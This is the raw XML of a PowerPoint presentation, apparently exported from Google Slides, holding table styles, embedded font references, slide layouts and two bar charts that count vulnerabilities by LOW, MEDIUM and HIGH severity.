
<file path=[Content_Types].xml><?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default ContentType="image/jpeg" Extension="jpg"/>
  <Default ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet" Extension="xlsx"/>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1.xml"/>
  <Override ContentType="application/vnd.ms-office.chartcolorstyle+xml" PartName="/ppt/charts/colors2.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2.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/ppt/charts/chart1.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ms-office.chartstyle+xml" PartName="/ppt/charts/style1.xml"/>
  <Override ContentType="application/vnd.ms-office.chartstyle+xml" PartName="/ppt/charts/style2.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Lst>
  <p:sldSz cy="6858000" cx="12192000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Arimo"/>
      <p:regular r:id="rId111"/>
      <p:bold r:id="rId112"/>
      <p:italic r:id="rId113"/>
      <p:boldItalic r:id="rId114"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Quattrocento Sans"/>
      <p:regular r:id="rId115"/>
      <p:bold r:id="rId116"/>
      <p:italic r:id="rId117"/>
      <p:boldItalic r:id="rId1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119" roundtripDataSignature="AMtx7miq8RzIdZM0UKOIoHWfXpai9wIY/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60C7370-9768-4E96-B8B1-DA89375A92FC}">
  <a:tblStyle styleId="{B60C7370-9768-4E96-B8B1-DA89375A92FC}" styleName="Table_0">
    <a:wholeTbl>
      <a:tcTxStyle b="off" i="off">
        <a:font>
          <a:latin typeface="Segoe UI"/>
          <a:ea typeface="Segoe UI"/>
          <a:cs typeface="Segoe U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6E6"/>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:wholeTbl>
    <a:band1H>
      <a:tcTxStyle/>
      <a:tcStyle>
        <a:fill>
          <a:solidFill>
            <a:srgbClr val="CACACA"/>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:band1H>
    <a:band2H>
      <a:tcTxStyle/>
    </a:band2H>
    <a:band1V>
      <a:tcTxStyle/>
      <a:tcStyle>
        <a:fill>
          <a:solidFill>
            <a:srgbClr val="CACACA"/>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:band1V>
    <a:band2V>
      <a:tcTxStyle/>
    </a:band2V>
    <a:lastCol>
      <a:tcTxStyle b="on" i="off">
        <a:font>
          <a:latin typeface="Segoe UI"/>
          <a:ea typeface="Segoe UI"/>
          <a:cs typeface="Segoe UI"/>
        </a:font>
        <a:schemeClr val="lt1"/>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:fill>
          <a:solidFill>
            <a:schemeClr val="dk1"/>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:lastCol>
    <a:firstCol>
      <a:tcTxStyle b="on" i="off">
        <a:font>
          <a:latin typeface="Segoe UI"/>
          <a:ea typeface="Segoe UI"/>
          <a:cs typeface="Segoe UI"/>
        </a:font>
        <a:schemeClr val="lt1"/>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:fill>
          <a:solidFill>
            <a:schemeClr val="dk1"/>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:firstCol>
    <a:lastRow>
      <a:tcTxStyle b="on" i="off">
        <a:font>
          <a:latin typeface="Segoe UI"/>
          <a:ea typeface="Segoe UI"/>
          <a:cs typeface="Segoe UI"/>
        </a:font>
        <a:schemeClr val="lt1"/>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:tcBdr>
          <a:top>
            <a:ln cap="flat" cmpd="sng" w="38100">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd len="sm" w="sm" type="none"/>
              <a:tailEnd len="sm" w="sm" type="none"/>
            </a:ln>
          </a:top>
        </a:tcBdr>
        <a:fill>
          <a:solidFill>
            <a:schemeClr val="dk1"/>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:lastRow>
    <a:seCell>
      <a:tcTxStyle/>
    </a:seCell>
    <a:swCell>
      <a:tcTxStyle/>
    </a:swCell>
    <a:firstRow>
      <a:tcTxStyle b="on" i="off">
        <a:font>
          <a:latin typeface="Segoe UI"/>
          <a:ea typeface="Segoe UI"/>
          <a:cs typeface="Segoe UI"/>
        </a:font>
        <a:schemeClr val="lt1"/>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:tcBdr>
          <a:bottom>
            <a:ln cap="flat" cmpd="sng" w="38100">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd len="sm" w="sm" type="none"/>
              <a:tailEnd len="sm" w="sm" type="none"/>
            </a:ln>
          </a:bottom>
        </a:tcBdr>
        <a:fill>
          <a:solidFill>
            <a:schemeClr val="dk1"/>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:firstRow>
    <a:neCell>
      <a:tcTxStyle/>
    </a:neCell>
    <a:nwCell>
      <a:tcTxStyle/>
    </a:nwCell>
  </a:tblStyle>
  <a:tblStyle styleId="{28809880-DC93-42FB-976C-2E7F37E6F614}" styleName="Table_1">
    <a:wholeTbl>
      <a:tcTxStyle b="off" i="off">
        <a:font>
          <a:latin typeface="Segoe UI"/>
          <a:ea typeface="Segoe UI"/>
          <a:cs typeface="Segoe U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Segoe UI"/>
          <a:ea typeface="Segoe UI"/>
          <a:cs typeface="Segoe UI"/>
        </a:font>
        <a:schemeClr val="lt1"/>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:fill>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:lastCol>
    <a:firstCol>
      <a:tcTxStyle b="on" i="off">
        <a:font>
          <a:latin typeface="Segoe UI"/>
          <a:ea typeface="Segoe UI"/>
          <a:cs typeface="Segoe UI"/>
        </a:font>
        <a:schemeClr val="lt1"/>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:fill>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:firstCol>
    <a:lastRow>
      <a:tcTxStyle b="on" i="off">
        <a:font>
          <a:latin typeface="Segoe UI"/>
          <a:ea typeface="Segoe UI"/>
          <a:cs typeface="Segoe U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Segoe UI"/>
          <a:ea typeface="Segoe UI"/>
          <a:cs typeface="Segoe U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font" Target="fonts/QuattrocentoSans-boldItalic.fntdata"/><Relationship Id="rId117" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/QuattrocentoSans-italic.fntdata"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/QuattrocentoSans-bold.fntdata"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/QuattrocentoSans-regular.fntdata"/><Relationship Id="rId119" Type="http://customschemas.google.com/relationships/presentationmetadata" Target="metadata"/><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Arimo-boldItalic.fntdata"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide12.xml"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Arimo-italic.fntdata"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Arimo-bold.fntdata"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Arimo-regular.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572399267671873E-2"/>
          <c:y val="0.10717968090676173"/>
          <c:w val="0.89916106008960606"/>
          <c:h val="0.78999835199321167"/>
        </c:manualLayout>
      </c:layout>
      <c:barChart>
        <c:barDir val="col"/>
        <c:grouping val="stacked"/>
        <c:varyColors val="0"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:v>LOW</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="92D050"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:invertIfNegative val="0"/>
          <c:dPt>
            <c:idx val="0"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000003-2C5C-4DAF-A57B-649B71805FFB}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000004-2C5C-4DAF-A57B-649B71805FFB}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="2"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000005-2C5C-4DAF-A57B-649B71805FFB}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="3"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000006-2C5C-4DAF-A57B-649B71805FFB}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:cat>
            <c:numRef>
              <c:f>Sheet1!$A$2:$A$5</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="4"/>
              </c:numCache>
            </c:numRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$B$2:$B$5</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="4"/>
                <c:pt idx="0">
                  <c:v>15</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>14</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>1</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-2C5C-4DAF-A57B-649B71805FFB}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>MEDIUM</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:invertIfNegative val="0"/>
          <c:cat>
            <c:numRef>
              <c:f>Sheet1!$A$2:$A$5</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="4"/>
              </c:numCache>
            </c:numRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$C$2:$C$5</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="4"/>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000001-2C5C-4DAF-A57B-649B71805FFB}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:v>HIGH</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:invertIfNegative val="0"/>
          <c:cat>
            <c:numRef>
              <c:f>Sheet1!$A$2:$A$5</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="4"/>
              </c:numCache>
            </c:numRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$D$2:$D$5</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="4"/>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000002-2C5C-4DAF-A57B-649B71805FFB}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="75"/>
        <c:overlap val="100"/>
        <c:axId val="617706032"/>
        <c:axId val="617708984"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="61770603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dirty="0"/>
                  <a:t>NO. OF VULNERABILITIES</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17708984"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="617708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17706032"/>
        <c:crosses val="autoZero"/>
        <c:crossBetween val="between"/>
      </c:valAx>
      <c:spPr>
        <a:noFill/>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst/>
      </c:spPr>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:layout>
        <c:manualLayout>
          <c:xMode val="edge"/>
          <c:yMode val="edge"/>
          <c:x val="0.78004945447509044"/>
          <c:y val="0.16583281724615886"/>
          <c:w val="0.20577285176309479"/>
          <c:h val="0.4500991624642425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572399267671873E-2"/>
          <c:y val="0.10717968090676173"/>
          <c:w val="0.89916106008960606"/>
          <c:h val="0.78999835199321167"/>
        </c:manualLayout>
      </c:layout>
      <c:barChart>
        <c:barDir val="col"/>
        <c:grouping val="stacked"/>
        <c:varyColors val="0"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:v>LOW</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="92D050"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:invertIfNegative val="0"/>
          <c:dPt>
            <c:idx val="0"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000003-2C5C-4DAF-A57B-649B71805FFB}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000004-2C5C-4DAF-A57B-649B71805FFB}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="2"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000005-2C5C-4DAF-A57B-649B71805FFB}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="3"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000006-2C5C-4DAF-A57B-649B71805FFB}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:cat>
            <c:numRef>
              <c:f>Sheet1!$A$2:$A$5</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="4"/>
              </c:numCache>
            </c:numRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$B$2:$B$5</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="4"/>
                <c:pt idx="0">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>0</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-2C5C-4DAF-A57B-649B71805FFB}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>MEDIUM</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:invertIfNegative val="0"/>
          <c:cat>
            <c:numRef>
              <c:f>Sheet1!$A$2:$A$5</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="4"/>
              </c:numCache>
            </c:numRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$C$2:$C$5</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="4"/>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000001-2C5C-4DAF-A57B-649B71805FFB}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:v>HIGH</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:invertIfNegative val="0"/>
          <c:cat>
            <c:numRef>
              <c:f>Sheet1!$A$2:$A$5</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="4"/>
              </c:numCache>
            </c:numRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$D$2:$D$5</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="4"/>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000002-2C5C-4DAF-A57B-649B71805FFB}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="75"/>
        <c:overlap val="100"/>
        <c:axId val="617706032"/>
        <c:axId val="617708984"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="61770603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IN" dirty="0"/>
                  <a:t>NO. OF VULNERABILITIES</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17708984"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="617708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17706032"/>
        <c:crosses val="autoZero"/>
        <c:crossBetween val="between"/>
      </c:valAx>
      <c:spPr>
        <a:noFill/>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst/>
      </c:spPr>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:layout>
        <c:manualLayout>
          <c:xMode val="edge"/>
          <c:yMode val="edge"/>
          <c:x val="0.78004945447509044"/>
          <c:y val="0.16583281724615886"/>
          <c:w val="0.20577285176309479"/>
          <c:h val="0.4500991624642425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 name="Google Shape;5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6" name="Google Shape;56;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p10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4" name="Google Shape;794;p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p10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1" name="Google Shape;801;p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p10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8" name="Google Shape;808;p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10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6" name="Google Shape;816;p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p10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2" name="Google Shape;822;p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 name="Google Shape;6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 name="Google Shape;7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 name="Google Shape;7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 name="Google Shape;8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7" name="Google Shape;447;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2" name="Google Shape;462;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7" name="Google Shape;477;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3" name="Google Shape;483;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2" name="Google Shape;492;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8" name="Google Shape;498;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7" name="Google Shape;507;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3" name="Google Shape;513;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2" name="Google Shape;522;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8" name="Google Shape;528;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7" name="Google Shape;537;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3" name="Google Shape;543;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2" name="Google Shape;552;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8" name="Google Shape;558;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2" name="Google Shape;582;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9" name="Google Shape;589;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8" name="Google Shape;598;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5" name="Google Shape;605;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4" name="Google Shape;614;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1" name="Google Shape;621;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0" name="Google Shape;630;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6" name="Google Shape;636;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5" name="Google Shape;645;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1" name="Google Shape;651;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0" name="Google Shape;660;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7" name="Google Shape;667;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4" name="Google Shape;674;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0" name="Google Shape;680;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p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1" name="Google Shape;691;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p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8" name="Google Shape;698;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4" name="Google Shape;704;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3" name="Google Shape;713;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0" name="Google Shape;720;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9" name="Google Shape;729;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9" name="Google Shape;739;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8" name="Google Shape;748;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p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5" name="Google Shape;755;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p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1" name="Google Shape;761;p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7" name="Google Shape;767;p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p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4" name="Google Shape;774;p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p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1" name="Google Shape;781;p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9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7" name="Google Shape;787;p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 Id="rId4"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17" name="Shape 17"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Google Shape;18;p106"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1122363"/>
            <a:ext cx="10363200" cy="23876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6000"/>
              <a:buFont typeface="Quattrocento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0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150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
              <a:defRPr sz="2400"/>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Google Shape;20;p106"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="10" type="dt"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539496" y="6203952"/>
            <a:ext cx="3276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06"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="11" type="ftr"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
